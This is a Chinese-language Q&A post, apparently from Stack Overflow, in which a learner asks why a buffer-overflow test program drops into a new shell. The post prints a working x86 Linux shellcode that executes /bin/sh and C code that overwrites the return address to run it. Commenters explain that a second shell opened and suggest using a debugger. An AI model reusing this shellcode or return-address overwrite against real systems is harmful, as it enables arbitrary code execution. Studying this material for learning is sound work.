【发布时间】:2013-08-14 05:27:28
【问题描述】:
您好,我正在了解Buffer Overflow。为了更好地理解,我写了一个小代码来检查发生了什么,但我没有发现任何错误。
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
然后输出:
[krishna]$ gcc -o testsc testsc.c
[krishna]$ ./testsc
$ exit
[krishna]$
为什么是exit?我可以通过任何其他方式检查程序执行时内部发生的情况。
如果我的方法不够好,我还能尝试什么?
【问题讨论】:
-
$前面的exit告诉你还有另一个shell。 -
@MihaiMaruseac... 我怎样才能检查另一个外壳?
-
你自己生成了shellcode吗?
-
最好的办法是在 ollydbg 或 IDA PRO 之类的反汇编程序中运行测试,并逐行断点以查看它到底做了什么。
标签: c buffer-overflow